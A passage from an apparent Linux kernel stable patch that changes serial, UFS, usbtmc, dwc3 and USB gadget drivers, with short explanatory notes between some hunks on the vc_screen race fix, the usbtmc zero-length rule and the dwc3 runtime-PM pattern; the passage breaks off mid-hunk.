+ #define PCI_DEVICE_ID_ADVANTECH_PCI3618	0x3618
+ #define PCI_DEVICE_ID_ADVANTECH_PCIf618	0xf618
+@@ -4105,6 +4107,9 @@ static SIMPLE_DEV_PM_OPS(pciserial_pm_ops, pciserial_suspend_one,
+ 			 pciserial_resume_one);
+ 
+ static const struct pci_device_id serial_pci_tbl[] = {
++	{	PCI_VENDOR_ID_ADVANTECH, PCI_DEVICE_ID_ADVANTECH_PCI1600,
++		PCI_DEVICE_ID_ADVANTECH_PCI1600_1611, PCI_ANY_ID, 0, 0,
++		pbn_b0_4_921600 },
+ 	/* Advantech use PCI_DEVICE_ID_ADVANTECH_PCI3620 (0x3620) as 'PCI_SUBVENDOR_ID' */
+ 	{	PCI_VENDOR_ID_ADVANTECH, PCI_DEVICE_ID_ADVANTECH_PCI3620,
+ 		PCI_DEVICE_ID_ADVANTECH_PCI3620, 0x0001, 0, 0,
+diff --git a/drivers/tty/serial/arc_uart.c b/drivers/tty/serial/arc_uart.c
+index 2a65ea2660e10..f3ccc59d8c1f3 100644
+--- a/drivers/tty/serial/arc_uart.c
++++ b/drivers/tty/serial/arc_uart.c
+@@ -607,10 +607,11 @@ static int arc_serial_probe(struct platform_device *pdev)
+ 	}
+ 	uart->baud = val;
+ 
+-	port->membase = of_iomap(np, 0);
+-	if (!port->membase)
++	port->membase = devm_platform_ioremap_resource(pdev, 0);
++	if (IS_ERR(port->membase)) {
+ 		/* No point in dev_err since UART itself is hosed here */
+-		return -ENXIO;
++		return PTR_ERR(port->membase);
++	}
+ 
+ 	port->irq = irq_of_parse_and_map(np, 0);
+ 
+diff --git a/drivers/tty/serial/qcom_geni_serial.c b/drivers/tty/serial/qcom_geni_serial.c
+index 7905935b9f1b4..cf9dc2ddfe664 100644
+--- a/drivers/tty/serial/qcom_geni_serial.c
++++ b/drivers/tty/serial/qcom_geni_serial.c
+@@ -1483,19 +1483,18 @@ static int qcom_geni_serial_probe(struct platform_device *pdev)
+ 	platform_set_drvdata(pdev, port);
+ 	port->handle_rx = console ? handle_rx_console : handle_rx_uart;
+ 
+-	ret = uart_add_one_port(drv, uport);
+-	if (ret)
+-		return ret;
+-
+ 	irq_set_status_flags(uport->irq, IRQ_NOAUTOEN);
+ 	ret = devm_request_irq(uport->dev, uport->irq, qcom_geni_serial_isr,
+ 			IRQF_TRIGGER_HIGH, port->name, uport);
+ 	if (ret) {
+ 		dev_err(uport->dev, "Failed to get IRQ ret %d\n", ret);
+-		uart_remove_one_port(drv, uport);
+ 		return ret;
+ 	}
+ 
++	ret = uart_add_one_port(drv, uport);
++	if (ret)
++		return ret;
++
+ 	/*
+ 	 * Set pm_runtime status as ACTIVE so that wakeup_irq gets
+ 	 * enabled/disabled from dev_pm_arm_wake_irq during system
+diff --git a/drivers/tty/vt/vc_screen.c b/drivers/tty/vt/vc_screen.c
+index 1dc07f9214d57..01c96537fa36b 100644
+--- a/drivers/tty/vt/vc_screen.c
++++ b/drivers/tty/vt/vc_screen.c
+@@ -656,10 +656,17 @@ vcs_write(struct file *file, const char __user *buf, size_t count, loff_t *ppos)
+ 			}
+ 		}
+ 
+-		/* The vcs_size might have changed while we slept to grab
+-		 * the user buffer, so recheck.
++		/* The vc might have been freed or vcs_size might have changed
++		 * while we slept to grab the user buffer, so recheck.
+ 		 * Return data written up to now on failure.
+ 		 */
++		vc = vcs_vc(inode, &viewed);
++		if (!vc) {
++			if (written)
++				break;
++			ret = -ENXIO;
++			goto unlock_out;
++		}
+ 		size = vcs_size(vc, attr, false);
+ 		if (size < 0) {
+ 			if (written)
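
The vc_screen fix is the classic revalidate-after-sleep pattern: a pointer looked up under a lock must be looked up again after any blocking operation during which the lock was dropped and the object may have been freed; here the blocking operation is faulting in the user buffer. Schematically (a sketch, not the vcs code itself):

    vc = vcs_vc(inode, &viewed);    /* first lookup, under console lock */
    /* ... copy from userspace; may sleep, lock dropped around it ... */
    vc = vcs_vc(inode, &viewed);    /* revalidate: the vc may be gone   */
    if (!vc)
            return -ENXIO;          /* or report the bytes written so far */
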
+diff --git a/drivers/ufs/core/ufshcd.c b/drivers/ufs/core/ufshcd.c
+index d89ce7fb6b363..977bd4b9dd0b4 100644
+--- a/drivers/ufs/core/ufshcd.c
++++ b/drivers/ufs/core/ufshcd.c
+@@ -9058,8 +9058,16 @@ static int __ufshcd_wl_suspend(struct ufs_hba *hba, enum ufs_pm_op pm_op)
+ 			 * that performance might be impacted.
+ 			 */
+ 			ret = ufshcd_urgent_bkops(hba);
+-			if (ret)
++			if (ret) {
++				/*
++				 * If an error is returned in the suspend flow,
++				 * I/O will hang. Trigger the error handler and
++				 * abort suspend for error recovery.
++				 */
++				ufshcd_force_error_recovery(hba);
++				ret = -EBUSY;
+ 				goto enable_scaling;
++			}
+ 		} else {
+ 			/* make sure that auto bkops is disabled */
+ 			ufshcd_disable_auto_bkops(hba);
+diff --git a/drivers/ufs/host/ufshcd-pci.c b/drivers/ufs/host/ufshcd-pci.c
+index 1c91f43e15c8e..9c911787f84c6 100644
+--- a/drivers/ufs/host/ufshcd-pci.c
++++ b/drivers/ufs/host/ufshcd-pci.c
+@@ -607,6 +607,7 @@ static const struct pci_device_id ufshcd_pci_tbl[] = {
+ 	{ PCI_VDEVICE(INTEL, 0x51FF), (kernel_ulong_t)&ufs_intel_adl_hba_vops },
+ 	{ PCI_VDEVICE(INTEL, 0x54FF), (kernel_ulong_t)&ufs_intel_adl_hba_vops },
+ 	{ PCI_VDEVICE(INTEL, 0x7E47), (kernel_ulong_t)&ufs_intel_mtl_hba_vops },
++	{ PCI_VDEVICE(INTEL, 0xA847), (kernel_ulong_t)&ufs_intel_mtl_hba_vops },
+ 	{ }	/* terminate list */
+ };
+ 
+diff --git a/drivers/usb/class/usbtmc.c b/drivers/usb/class/usbtmc.c
+index 4bb6d304eb4b2..311007b1d9046 100644
+--- a/drivers/usb/class/usbtmc.c
++++ b/drivers/usb/class/usbtmc.c
+@@ -1928,6 +1928,8 @@ static int usbtmc_ioctl_request(struct usbtmc_device_data *data,
+ 
+ 	if (request.req.wLength > USBTMC_BUFSIZE)
+ 		return -EMSGSIZE;
++	if (request.req.wLength == 0)	/* Length-0 requests are never IN */
++		request.req.bRequestType &= ~USB_DIR_IN;
+ 
+ 	is_in = request.req.bRequestType & USB_DIR_IN;
+ 
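
The usbtmc check encodes a USB invariant: a control transfer with wLength == 0 has no data stage, so the direction bit in bmRequestType carries no meaning and such requests are treated as OUT. Leaving USB_DIR_IN set would make the driver expect an IN data stage that never occurs. Reduced to its essence:

    /* wLength == 0  =>  no data stage  =>  force direction to OUT. */
    if (req->wLength == 0)
            req->bRequestType &= ~USB_DIR_IN;   /* clear bit 7 */
    is_in = req->bRequestType & USB_DIR_IN;     /* now 0 for length-0 */
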
+diff --git a/drivers/usb/dwc3/debugfs.c b/drivers/usb/dwc3/debugfs.c
+index 850df0e6bcabf..f0ffd2e5c6429 100644
+--- a/drivers/usb/dwc3/debugfs.c
++++ b/drivers/usb/dwc3/debugfs.c
+@@ -327,6 +327,11 @@ static int dwc3_lsp_show(struct seq_file *s, void *unused)
+ 	unsigned int		current_mode;
+ 	unsigned long		flags;
+ 	u32			reg;
++	int			ret;
++
++	ret = pm_runtime_resume_and_get(dwc->dev);
++	if (ret < 0)
++		return ret;
+ 
+ 	spin_lock_irqsave(&dwc->lock, flags);
+ 	reg = dwc3_readl(dwc->regs, DWC3_GSTS);
+@@ -345,6 +350,8 @@ static int dwc3_lsp_show(struct seq_file *s, void *unused)
+ 	}
+ 	spin_unlock_irqrestore(&dwc->lock, flags);
+ 
++	pm_runtime_put_sync(dwc->dev);
++
+ 	return 0;
+ }
+ 
+@@ -390,6 +397,11 @@ static int dwc3_mode_show(struct seq_file *s, void *unused)
+ 	struct dwc3		*dwc = s->private;
+ 	unsigned long		flags;
+ 	u32			reg;
++	int			ret;
++
++	ret = pm_runtime_resume_and_get(dwc->dev);
++	if (ret < 0)
++		return ret;
+ 
+ 	spin_lock_irqsave(&dwc->lock, flags);
+ 	reg = dwc3_readl(dwc->regs, DWC3_GCTL);
+@@ -409,6 +421,8 @@ static int dwc3_mode_show(struct seq_file *s, void *unused)
+ 		seq_printf(s, "UNKNOWN %08x\n", DWC3_GCTL_PRTCAP(reg));
+ 	}
+ 
++	pm_runtime_put_sync(dwc->dev);
++
+ 	return 0;
+ }
+ 
+@@ -458,6 +472,11 @@ static int dwc3_testmode_show(struct seq_file *s, void *unused)
+ 	struct dwc3		*dwc = s->private;
+ 	unsigned long		flags;
+ 	u32			reg;
++	int			ret;
++
++	ret = pm_runtime_resume_and_get(dwc->dev);
++	if (ret < 0)
++		return ret;
+ 
+ 	spin_lock_irqsave(&dwc->lock, flags);
+ 	reg = dwc3_readl(dwc->regs, DWC3_DCTL);
+@@ -488,6 +507,8 @@ static int dwc3_testmode_show(struct seq_file *s, void *unused)
+ 		seq_printf(s, "UNKNOWN %d\n", reg);
+ 	}
+ 
++	pm_runtime_put_sync(dwc->dev);
++
+ 	return 0;
+ }
+ 
+@@ -504,6 +525,7 @@ static ssize_t dwc3_testmode_write(struct file *file,
+ 	unsigned long		flags;
+ 	u32			testmode = 0;
+ 	char			buf[32];
++	int			ret;
+ 
+ 	if (copy_from_user(&buf, ubuf, min_t(size_t, sizeof(buf) - 1, count)))
+ 		return -EFAULT;
+@@ -521,10 +543,16 @@ static ssize_t dwc3_testmode_write(struct file *file,
+ 	else
+ 		testmode = 0;
+ 
++	ret = pm_runtime_resume_and_get(dwc->dev);
++	if (ret < 0)
++		return ret;
++
+ 	spin_lock_irqsave(&dwc->lock, flags);
+ 	dwc3_gadget_set_test_mode(dwc, testmode);
+ 	spin_unlock_irqrestore(&dwc->lock, flags);
+ 
++	pm_runtime_put_sync(dwc->dev);
++
+ 	return count;
+ }
+ 
+@@ -543,12 +571,18 @@ static int dwc3_link_state_show(struct seq_file *s, void *unused)
+ 	enum dwc3_link_state	state;
+ 	u32			reg;
+ 	u8			speed;
++	int			ret;
++
++	ret = pm_runtime_resume_and_get(dwc->dev);
++	if (ret < 0)
++		return ret;
+ 
+ 	spin_lock_irqsave(&dwc->lock, flags);
+ 	reg = dwc3_readl(dwc->regs, DWC3_GSTS);
+ 	if (DWC3_GSTS_CURMOD(reg) != DWC3_GSTS_CURMOD_DEVICE) {
+ 		seq_puts(s, "Not available\n");
+ 		spin_unlock_irqrestore(&dwc->lock, flags);
++		pm_runtime_put_sync(dwc->dev);
+ 		return 0;
+ 	}
+ 
+@@ -561,6 +595,8 @@ static int dwc3_link_state_show(struct seq_file *s, void *unused)
+ 		   dwc3_gadget_hs_link_string(state));
+ 	spin_unlock_irqrestore(&dwc->lock, flags);
+ 
++	pm_runtime_put_sync(dwc->dev);
++
+ 	return 0;
+ }
+ 
+@@ -579,6 +615,7 @@ static ssize_t dwc3_link_state_write(struct file *file,
+ 	char			buf[32];
+ 	u32			reg;
+ 	u8			speed;
++	int			ret;
+ 
+ 	if (copy_from_user(&buf, ubuf, min_t(size_t, sizeof(buf) - 1, count)))
+ 		return -EFAULT;
+@@ -598,10 +635,15 @@ static ssize_t dwc3_link_state_write(struct file *file,
+ 	else
+ 		return -EINVAL;
+ 
++	ret = pm_runtime_resume_and_get(dwc->dev);
++	if (ret < 0)
++		return ret;
++
+ 	spin_lock_irqsave(&dwc->lock, flags);
+ 	reg = dwc3_readl(dwc->regs, DWC3_GSTS);
+ 	if (DWC3_GSTS_CURMOD(reg) != DWC3_GSTS_CURMOD_DEVICE) {
+ 		spin_unlock_irqrestore(&dwc->lock, flags);
++		pm_runtime_put_sync(dwc->dev);
+ 		return -EINVAL;
+ 	}
+ 
+@@ -611,12 +653,15 @@ static ssize_t dwc3_link_state_write(struct file *file,
+ 	if (speed < DWC3_DSTS_SUPERSPEED &&
+ 	    state != DWC3_LINK_STATE_RECOV) {
+ 		spin_unlock_irqrestore(&dwc->lock, flags);
++		pm_runtime_put_sync(dwc->dev);
+ 		return -EINVAL;
+ 	}
+ 
+ 	dwc3_gadget_set_link_state(dwc, state);
+ 	spin_unlock_irqrestore(&dwc->lock, flags);
+ 
++	pm_runtime_put_sync(dwc->dev);
++
+ 	return count;
+ }
+ 
+@@ -640,6 +685,11 @@ static int dwc3_tx_fifo_size_show(struct seq_file *s, void *unused)
+ 	unsigned long		flags;
+ 	u32			mdwidth;
+ 	u32			val;
++	int			ret;
++
++	ret = pm_runtime_resume_and_get(dwc->dev);
++	if (ret < 0)
++		return ret;
+ 
+ 	spin_lock_irqsave(&dwc->lock, flags);
+ 	val = dwc3_core_fifo_space(dep, DWC3_TXFIFO);
+@@ -652,6 +702,8 @@ static int dwc3_tx_fifo_size_show(struct seq_file *s, void *unused)
+ 	seq_printf(s, "%u\n", val);
+ 	spin_unlock_irqrestore(&dwc->lock, flags);
+ 
++	pm_runtime_put_sync(dwc->dev);
++
+ 	return 0;
+ }
+ 
+@@ -662,6 +714,11 @@ static int dwc3_rx_fifo_size_show(struct seq_file *s, void *unused)
+ 	unsigned long		flags;
+ 	u32			mdwidth;
+ 	u32			val;
++	int			ret;
++
++	ret = pm_runtime_resume_and_get(dwc->dev);
++	if (ret < 0)
++		return ret;
+ 
+ 	spin_lock_irqsave(&dwc->lock, flags);
+ 	val = dwc3_core_fifo_space(dep, DWC3_RXFIFO);
+@@ -674,6 +731,8 @@ static int dwc3_rx_fifo_size_show(struct seq_file *s, void *unused)
+ 	seq_printf(s, "%u\n", val);
+ 	spin_unlock_irqrestore(&dwc->lock, flags);
+ 
++	pm_runtime_put_sync(dwc->dev);
++
+ 	return 0;
+ }
+ 
+@@ -683,12 +742,19 @@ static int dwc3_tx_request_queue_show(struct seq_file *s, void *unused)
+ 	struct dwc3		*dwc = dep->dwc;
+ 	unsigned long		flags;
+ 	u32			val;
++	int			ret;
++
++	ret = pm_runtime_resume_and_get(dwc->dev);
++	if (ret < 0)
++		return ret;
+ 
+ 	spin_lock_irqsave(&dwc->lock, flags);
+ 	val = dwc3_core_fifo_space(dep, DWC3_TXREQQ);
+ 	seq_printf(s, "%u\n", val);
+ 	spin_unlock_irqrestore(&dwc->lock, flags);
+ 
++	pm_runtime_put_sync(dwc->dev);
++
+ 	return 0;
+ }
+ 
+@@ -698,12 +764,19 @@ static int dwc3_rx_request_queue_show(struct seq_file *s, void *unused)
+ 	struct dwc3		*dwc = dep->dwc;
+ 	unsigned long		flags;
+ 	u32			val;
++	int			ret;
++
++	ret = pm_runtime_resume_and_get(dwc->dev);
++	if (ret < 0)
++		return ret;
+ 
+ 	spin_lock_irqsave(&dwc->lock, flags);
+ 	val = dwc3_core_fifo_space(dep, DWC3_RXREQQ);
+ 	seq_printf(s, "%u\n", val);
+ 	spin_unlock_irqrestore(&dwc->lock, flags);
+ 
++	pm_runtime_put_sync(dwc->dev);
++
+ 	return 0;
+ }
+ 
+@@ -713,12 +786,19 @@ static int dwc3_rx_info_queue_show(struct seq_file *s, void *unused)
+ 	struct dwc3		*dwc = dep->dwc;
+ 	unsigned long		flags;
+ 	u32			val;
++	int			ret;
++
++	ret = pm_runtime_resume_and_get(dwc->dev);
++	if (ret < 0)
++		return ret;
+ 
+ 	spin_lock_irqsave(&dwc->lock, flags);
+ 	val = dwc3_core_fifo_space(dep, DWC3_RXINFOQ);
+ 	seq_printf(s, "%u\n", val);
+ 	spin_unlock_irqrestore(&dwc->lock, flags);
+ 
++	pm_runtime_put_sync(dwc->dev);
++
+ 	return 0;
+ }
+ 
+@@ -728,12 +808,19 @@ static int dwc3_descriptor_fetch_queue_show(struct seq_file *s, void *unused)
+ 	struct dwc3		*dwc = dep->dwc;
+ 	unsigned long		flags;
+ 	u32			val;
++	int			ret;
++
++	ret = pm_runtime_resume_and_get(dwc->dev);
++	if (ret < 0)
++		return ret;
+ 
+ 	spin_lock_irqsave(&dwc->lock, flags);
+ 	val = dwc3_core_fifo_space(dep, DWC3_DESCFETCHQ);
+ 	seq_printf(s, "%u\n", val);
+ 	spin_unlock_irqrestore(&dwc->lock, flags);
+ 
++	pm_runtime_put_sync(dwc->dev);
++
+ 	return 0;
+ }
+ 
+@@ -743,12 +830,19 @@ static int dwc3_event_queue_show(struct seq_file *s, void *unused)
+ 	struct dwc3		*dwc = dep->dwc;
+ 	unsigned long		flags;
+ 	u32			val;
++	int			ret;
++
++	ret = pm_runtime_resume_and_get(dwc->dev);
++	if (ret < 0)
++		return ret;
+ 
+ 	spin_lock_irqsave(&dwc->lock, flags);
+ 	val = dwc3_core_fifo_space(dep, DWC3_EVENTQ);
+ 	seq_printf(s, "%u\n", val);
+ 	spin_unlock_irqrestore(&dwc->lock, flags);
+ 
++	pm_runtime_put_sync(dwc->dev);
++
+ 	return 0;
+ }
+ 
+@@ -793,6 +887,11 @@ static int dwc3_trb_ring_show(struct seq_file *s, void *unused)
+ 	struct dwc3		*dwc = dep->dwc;
+ 	unsigned long		flags;
+ 	int			i;
++	int			ret;
++
++	ret = pm_runtime_resume_and_get(dwc->dev);
++	if (ret < 0)
++		return ret;
+ 
+ 	spin_lock_irqsave(&dwc->lock, flags);
+ 	if (dep->number <= 1) {
+@@ -822,6 +921,8 @@ static int dwc3_trb_ring_show(struct seq_file *s, void *unused)
+ out:
+ 	spin_unlock_irqrestore(&dwc->lock, flags);
+ 
++	pm_runtime_put_sync(dwc->dev);
++
+ 	return 0;
+ }
+ 
+@@ -834,6 +935,11 @@ static int dwc3_ep_info_register_show(struct seq_file *s, void *unused)
+ 	u32			lower_32_bits;
+ 	u32			upper_32_bits;
+ 	u32			reg;
++	int			ret;
++
++	ret = pm_runtime_resume_and_get(dwc->dev);
++	if (ret < 0)
++		return ret;
+ 
+ 	spin_lock_irqsave(&dwc->lock, flags);
+ 	reg = DWC3_GDBGLSPMUX_EPSELECT(dep->number);
+@@ -846,6 +952,8 @@ static int dwc3_ep_info_register_show(struct seq_file *s, void *unused)
+ 	seq_printf(s, "0x%016llx\n", ep_info);
+ 	spin_unlock_irqrestore(&dwc->lock, flags);
+ 
++	pm_runtime_put_sync(dwc->dev);
++
+ 	return 0;
+ }
+ 
+@@ -905,6 +1013,7 @@ void dwc3_debugfs_init(struct dwc3 *dwc)
+ 	dwc->regset->regs = dwc3_regs;
+ 	dwc->regset->nregs = ARRAY_SIZE(dwc3_regs);
+ 	dwc->regset->base = dwc->regs - DWC3_GLOBALS_REGS_START;
++	dwc->regset->dev = dwc->dev;
+ 
+ 	root = debugfs_create_dir(dev_name(dwc->dev), usb_debug_root);
+ 	dwc->debug_root = root;
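
Every dwc3 debugfs handler in the hunk above gains the same runtime-PM bracket: take a usage reference and resume the controller before touching its registers, and drop the reference on every exit path, because reading DWC3 registers while the device is runtime-suspended can hang the bus. The skeleton, with 'dev' standing for dwc->dev (a sketch of the pattern, not any specific handler):

    static int foo_show(struct seq_file *s, void *unused)
    {
            int ret;

            ret = pm_runtime_resume_and_get(dev);   /* usage count +1, resumed */
            if (ret < 0)
                    return ret;     /* on failure the count is already dropped */

            /* ... read registers under the spinlock ... */

            pm_runtime_put_sync(dev);               /* usage count -1 */
            return 0;
    }

Setting dwc->regset->dev likewise lets the debugfs regset core apply the same resume/put bracket around register dumps.
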
+diff --git a/drivers/usb/dwc3/gadget.c b/drivers/usb/dwc3/gadget.c
+index daa7673833557..d12cb8f0d1f48 100644
+--- a/drivers/usb/dwc3/gadget.c
++++ b/drivers/usb/dwc3/gadget.c
+@@ -2587,6 +2587,21 @@ static int dwc3_gadget_soft_disconnect(struct dwc3 *dwc)
+ 	return ret;
+ }
+ 
++static int dwc3_gadget_soft_connect(struct dwc3 *dwc)
++{
++	/*
++	 * In the Synopsys DWC_usb31 1.90a programming guide section
++	 * 4.1.9, it specifies that a reconnect after a
++	 * device-initiated disconnect requires a core soft reset
++	 * (DCTL.CSftRst) before enabling the run/stop bit.
++	 */
++	dwc3_core_soft_reset(dwc);
++
++	dwc3_event_buffers_setup(dwc);
++	__dwc3_gadget_start(dwc);
++	return dwc3_gadget_run_stop(dwc, true);
++}
++
+ static int dwc3_gadget_pullup(struct usb_gadget *g, int is_on)
+ {
+ 	struct dwc3		*dwc = gadget_to_dwc(g);
+@@ -2625,21 +2640,10 @@ static int dwc3_gadget_pullup(struct usb_gadget *g, int is_on)
+ 
+ 	synchronize_irq(dwc->irq_gadget);
+ 
+-	if (!is_on) {
++	if (!is_on)
+ 		ret = dwc3_gadget_soft_disconnect(dwc);
+-	} else {
+-		/*
+-		 * In the Synopsys DWC_usb31 1.90a programming guide section
+-		 * 4.1.9, it specifies that for a reconnect after a
+-		 * device-initiated disconnect requires a core soft reset
+-		 * (DCTL.CSftRst) before enabling the run/stop bit.
+-		 */
+-		dwc3_core_soft_reset(dwc);
+-
+-		dwc3_event_buffers_setup(dwc);
+-		__dwc3_gadget_start(dwc);
+-		ret = dwc3_gadget_run_stop(dwc, true);
+-	}
++	else
++		ret = dwc3_gadget_soft_connect(dwc);
+ 
+ 	pm_runtime_put(dwc->dev);
+ 
+@@ -4555,42 +4559,39 @@ void dwc3_gadget_exit(struct dwc3 *dwc)
+ int dwc3_gadget_suspend(struct dwc3 *dwc)
+ {
+ 	unsigned long flags;
++	int ret;
+ 
+ 	if (!dwc->gadget_driver)
+ 		return 0;
+ 
+-	dwc3_gadget_run_stop(dwc, false);
++	ret = dwc3_gadget_soft_disconnect(dwc);
++	if (ret)
++		goto err;
+ 
+ 	spin_lock_irqsave(&dwc->lock, flags);
+ 	dwc3_disconnect_gadget(dwc);
+-	__dwc3_gadget_stop(dwc);
+ 	spin_unlock_irqrestore(&dwc->lock, flags);
+ 
+ 	return 0;
++
++err:
++	/*
++	 * Attempt to reset the controller's state. Likely no
++	 * communication can be established until the host
++	 * performs a port reset.
++	 */
++	if (dwc->softconnect)
++		dwc3_gadget_soft_connect(dwc);
++
++	return ret;
+ }
+ 
+ int dwc3_gadget_resume(struct dwc3 *dwc)
+ {
+-	int			ret;
+-
+ 	if (!dwc->gadget_driver || !dwc->softconnect)
+ 		return 0;
+ 
+-	ret = __dwc3_gadget_start(dwc);
+-	if (ret < 0)
+-		goto err0;
+-
+-	ret = dwc3_gadget_run_stop(dwc, true);
+-	if (ret < 0)
+-		goto err1;
+-
+-	return 0;
+-
+-err1:
+-	__dwc3_gadget_stop(dwc);
+-
+-err0:
+-	return ret;
++	return dwc3_gadget_soft_connect(dwc);
+ }
+ 
+ void dwc3_gadget_process_pending_events(struct dwc3 *dwc)
+diff --git a/drivers/usb/gadget/function/u_ether.c b/drivers/usb/gadget/function/u_ether.c
+index e06022873df16..1f420ff8f4232 100644
+--- a/drivers/usb/gadget/function/u_ether.c
++++ b/drivers/usb/gadget/function/u_ether.c
+@@ -17,6 +17,7 @@
+ #include <linux/etherdevice.h>
+ #include <linux/ethtool.h>
+ #include <linux/if_vlan.h>
++#include <linux/string_helpers.h>
+ 
+ #include "u_ether.h"
+ 
+@@ -978,6 +979,8 @@ int gether_get_host_addr_cdc(struct net_device *net, char *host_addr, int len)
+ 	dev = netdev_priv(net);
+ 	snprintf(host_addr, len, "%pm", dev->host_mac);
+ 
++	string_upper(host_addr, host_addr);
++
+ 	return strlen(host_addr);
+ }
+ EXPORT_SYMBOL_GPL(gether_get_host_addr_cdc);
+diff --git a/drivers/usb/gadget/udc/core.c b/drivers/usb/gadget/udc/core.c
+index e85706812d61e..bf9878e1a72a8 100644
+--- a/drivers/usb/gadget/udc/core.c
++++ b/drivers/usb/gadget/udc/core.c
+@@ -37,10 +37,6 @@ static struct bus_type gadget_bus_type;
+  * @vbus: for udcs who care about vbus status, this value is real vbus status;
+  * for udcs who do not care about vbus status, this value is always true
+  * @started: the UDC's started state. True if the UDC had started.
+- * @connect_lock: protects udc->vbus, udc->started, gadget->connect, gadget->deactivate related
+- * functions. usb_gadget_connect_locked, usb_gadget_disconnect_locked,
+- * usb_udc_connect_control_locked, usb_gadget_udc_start_locked, usb_gadget_udc_stop_locked are
+- * called with this lock held.
+  *
+  * This represents the internal data structure which is used by the UDC-class
+  * to hold information about udc driver and gadget together.
+@@ -52,7 +48,6 @@ struct usb_udc {
+ 	struct list_head		list;
+ 	bool				vbus;
+ 	bool				started;
+-	struct mutex			connect_lock;
+ };
+ 
+ static struct class *udc_class;
+@@ -665,9 +660,17 @@ out:
+ }
+ EXPORT_SYMBOL_GPL(usb_gadget_vbus_disconnect);
+ 
+-/* Internal version of usb_gadget_connect needs to be called with connect_lock held. */
+-static int usb_gadget_connect_locked(struct usb_gadget *gadget)
+-	__must_hold(&gadget->udc->connect_lock)
++/**
++ * usb_gadget_connect - software-controlled connect to USB host
++ * @gadget:the peripheral being connected
++ *
++ * Enables the D+ (or potentially D-) pullup.  The host will start
++ * enumerating this gadget when the pullup is active and a VBUS session
++ * is active (the link is powered).
++ *
++ * Returns zero on success, else negative errno.
++ */
++int usb_gadget_connect(struct usb_gadget *gadget)
+ {
+ 	int ret = 0;
+ 
+@@ -676,15 +679,10 @@ static int usb_gadget_connect_locked(struct usb_gadget *gadget)
+ 		goto out;
+ 	}
+ 
+-	if (gadget->connected)
+-		goto out;
+-
+-	if (gadget->deactivated || !gadget->udc->started) {
++	if (gadget->deactivated) {
+ 		/*
+ 		 * If gadget is deactivated we only save new state.
+ 		 * Gadget will be connected automatically after activation.
+-		 *
+-		 * udc first needs to be started before gadget can be pulled up.
+ 		 */
+ 		gadget->connected = true;
+ 		goto out;
+@@ -699,32 +697,22 @@ out:
+ 
+ 	return ret;
+ }
++EXPORT_SYMBOL_GPL(usb_gadget_connect);
+ 
+ /**
+- * usb_gadget_connect - software-controlled connect to USB host
+- * @gadget:the peripheral being connected
++ * usb_gadget_disconnect - software-controlled disconnect from USB host
++ * @gadget:the peripheral being disconnected
+  *
+- * Enables the D+ (or potentially D-) pullup.  The host will start
+- * enumerating this gadget when the pullup is active and a VBUS session
+- * is active (the link is powered).
++ * Disables the D+ (or potentially D-) pullup, which the host may see
++ * as a disconnect (when a VBUS session is active).  Not all systems
++ * support software pullup controls.
++ *
++ * Following a successful disconnect, invoke the ->disconnect() callback
++ * for the current gadget driver so that UDC drivers don't need to.
+  *
+  * Returns zero on success, else negative errno.
+  */
+-int usb_gadget_connect(struct usb_gadget *gadget)
+-{
+-	int ret;
+-
+-	mutex_lock(&gadget->udc->connect_lock);
+-	ret = usb_gadget_connect_locked(gadget);
+-	mutex_unlock(&gadget->udc->connect_lock);
+-
+-	return ret;
+-}
+-EXPORT_SYMBOL_GPL(usb_gadget_connect);
+-
+-/* Internal version of usb_gadget_disconnect needs to be called with connect_lock held. */
+-static int usb_gadget_disconnect_locked(struct usb_gadget *gadget)
+-	__must_hold(&gadget->udc->connect_lock)
++int usb_gadget_disconnect(struct usb_gadget *gadget)
+ {
+ 	int ret = 0;
+ 
+@@ -736,12 +724,10 @@ static int usb_gadget_disconnect_locked(struct usb_gadget *gadget)
+ 	if (!gadget->connected)
+ 		goto out;
+ 
+-	if (gadget->deactivated || !gadget->udc->started) {
++	if (gadget->deactivated) {
+ 		/*
+ 		 * If gadget is deactivated we only save new state.
+ 		 * Gadget will stay disconnected after activation.
+-		 *
+-		 * udc should have been started before gadget being pulled down.
+ 		 */
+ 		gadget->connected = false;
+ 		goto out;
+@@ -761,30 +747,6 @@ out:
+ 
+ 	return ret;
+ }
+-
+-/**
+- * usb_gadget_disconnect - software-controlled disconnect from USB host
+- * @gadget:the peripheral being disconnected
+- *
+- * Disables the D+ (or potentially D-) pullup, which the host may see
+- * as a disconnect (when a VBUS session is active).  Not all systems
+- * support software pullup controls.
+- *
+- * Following a successful disconnect, invoke the ->disconnect() callback
+- * for the current gadget driver so that UDC drivers don't need to.
+- *
+- * Returns zero on success, else negative errno.
+- */
+-int usb_gadget_disconnect(struct usb_gadget *gadget)
+-{
+-	int ret;
+-
+-	mutex_lock(&gadget->udc->connect_lock);
+-	ret = usb_gadget_disconnect_locked(gadget);
+-	mutex_unlock(&gadget->udc->connect_lock);
+-
+-	return ret;
+-}
+ EXPORT_SYMBOL_GPL(usb_gadget_disconnect);
+ 
+ /**
+@@ -805,11 +767,10 @@ int usb_gadget_deactivate(struct usb_gadget *gadget)
+ 	if (gadget->deactivated)
+ 		goto out;
+ 
+-	mutex_lock(&gadget->udc->connect_lock);
+ 	if (gadget->connected) {
+-		ret = usb_gadget_disconnect_locked(gadget);
++		ret = usb_gadget_disconnect(gadget);
+ 		if (ret)
+-			goto unlock;
++			goto out;
+ 
+ 		/*
+ 		 * If gadget was being connected before deactivation, we want
+@@ -819,8 +780,6 @@ int usb_gadget_deactivate(struct usb_gadget *gadget)
+ 	}
+ 	gadget->deactivated = true;
+ 
+-unlock:
+-	mutex_unlock(&gadget->udc->connect_lock);
+ out:
+ 	trace_usb_gadget_deactivate(gadget, ret);
+ 
+@@ -844,7 +803,6 @@ int usb_gadget_activate(struct usb_gadget *gadget)
+ 	if (!gadget->deactivated)
+ 		goto out;
+ 
+-	mutex_lock(&gadget->udc->connect_lock);
+ 	gadget->deactivated = false;
+ 
+ 	/*
+@@ -852,8 +810,7 @@ int usb_gadget_activate(struct usb_gadget *gadget)
+ 	 * while it was being deactivated, we call usb_gadget_connect().
+ 	 */
+ 	if (gadget->connected)
+-		ret = usb_gadget_connect_locked(gadget);
+-	mutex_unlock(&gadget->udc->connect_lock);
++		ret = usb_gadget_connect(gadget);
+ 
+ out:
+ 	trace_usb_gadget_activate(gadget, ret);
+@@ -1094,13 +1051,12 @@ EXPORT_SYMBOL_GPL(usb_gadget_set_state);
+ 
+ /* ------------------------------------------------------------------------- */
+ 
+-/* Acquire connect_lock before calling this function. */
+-static void usb_udc_connect_control_locked(struct usb_udc *udc) __must_hold(&udc->connect_lock)
++static void usb_udc_connect_control(struct usb_udc *udc)
+ {
+-	if (udc->vbus && udc->started)
